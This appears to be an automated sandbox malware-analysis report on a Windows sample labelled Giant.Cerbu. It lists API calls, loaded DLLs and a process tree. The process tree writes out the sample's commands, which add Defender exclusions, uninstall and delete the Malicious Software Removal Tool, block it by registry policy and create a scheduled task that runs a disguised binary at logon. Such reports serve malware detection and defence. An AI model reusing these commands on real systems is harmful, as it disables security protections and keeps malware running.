GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree, 24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DB9FF0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 24_2_00007FF6D9DB9FF0
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF8490639D1 12_2_00007FF8490639D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF8490630E9 12_2_00007FF8490630E9
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD0ED0 24_2_00007FF6D9DD0ED0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF8A90 24_2_00007FF6D9CF8A90
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1680 24_2_00007FF6D9CF1680
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF7E40 24_2_00007FF6D9CF7E40
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DCDA50 24_2_00007FF6D9DCDA50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DBFA10 24_2_00007FF6D9DBFA10
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DBADE0 24_2_00007FF6D9DBADE0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFAD98 24_2_00007FF6D9CFAD98
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF4140 24_2_00007FF6D9CF4140
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD08F0 24_2_00007FF6D9DD08F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D4AF80 24_2_00007FF6D9D4AF80
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF8B9D 24_2_00007FF6D9CF8B9D
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DDEF40 24_2_00007FF6D9DDEF40
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF8B9D 24_2_00007FF6D9CF8B9D
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D50300 24_2_00007FF6D9D50300
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFAEE2 24_2_00007FF6D9CFAEE2
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DE0AA0 24_2_00007FF6D9DE0AA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D2DAB0 24_2_00007FF6D9D2DAB0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFD2B0 24_2_00007FF6D9CFD2B0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF32A0 24_2_00007FF6D9CF32A0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D03A50 24_2_00007FF6D9D03A50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D0C650 24_2_00007FF6D9D0C650
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF3210 24_2_00007FF6D9CF3210
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DC7230 24_2_00007FF6D9DC7230
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D08A00 24_2_00007FF6D9D08A00
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D0EE10 24_2_00007FF6D9D0EE10
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D011D0 24_2_00007FF6D9D011D0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D085F0 24_2_00007FF6D9D085F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DC45D0 24_2_00007FF6D9DC45D0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D0DDA0 24_2_00007FF6D9D0DDA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D40DB0 24_2_00007FF6D9D40DB0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DE0180 24_2_00007FF6D9DE0180
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D06140 24_2_00007FF6D9D06140
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF4970 24_2_00007FF6D9CF4970
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D2A130 24_2_00007FF6D9D2A130
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1530 24_2_00007FF6D9CF1530
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D2B0F0 24_2_00007FF6D9D2B0F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D114F0 24_2_00007FF6D9D114F0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DC64C0 24_2_00007FF6D9DC64C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D24CC0 24_2_00007FF6D9D24CC0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF4CE0 24_2_00007FF6D9CF4CE0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D29CA0 24_2_00007FF6D9D29CA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D244A0 24_2_00007FF6D9D244A0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DE6480 24_2_00007FF6D9DE6480
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D020A0 24_2_00007FF6D9D020A0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF2C50 24_2_00007FF6D9CF2C50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DDF860 24_2_00007FF6D9DDF860
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D30060 24_2_00007FF6D9D30060
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF2C70 24_2_00007FF6D9CF2C70
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DBB050 24_2_00007FF6D9DBB050
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D34020 24_2_00007FF6D9D34020
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DC6400 24_2_00007FF6D9DC6400
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DCC3E0 24_2_00007FF6D9DCC3E0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D2D3C0 24_2_00007FF6D9D2D3C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D43BC0 24_2_00007FF6D9D43BC0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D2AFA0 24_2_00007FF6D9D2AFA0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D07B80 24_2_00007FF6D9D07B80
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D0D380 24_2_00007FF6D9D0D380
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9D50F90 24_2_00007FF6D9D50F90
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF4B50 24_2_00007FF6D9CF4B50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFDB59 24_2_00007FF6D9CFDB59
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: classification engine Classification label: mal100.evad.winEXE@27/6@0/0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD0ED0 CoCreateInstance,SysFreeString,CoSetProxyBlanket,GetErrorInfo,GetErrorInfo,SysFreeString,GetErrorInfo, 24_2_00007FF6D9DD0ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File created: C:\Users\Public\Pictures_Old Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:304:WilStaging_02
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Mutant created: \Sessions\1\BaseNamedObjects\HgSyVtdfIS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urbrehpo.yuf.ps1 Jump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: perfos.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll Jump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Section loaded: netutils.dll Jump to behavior
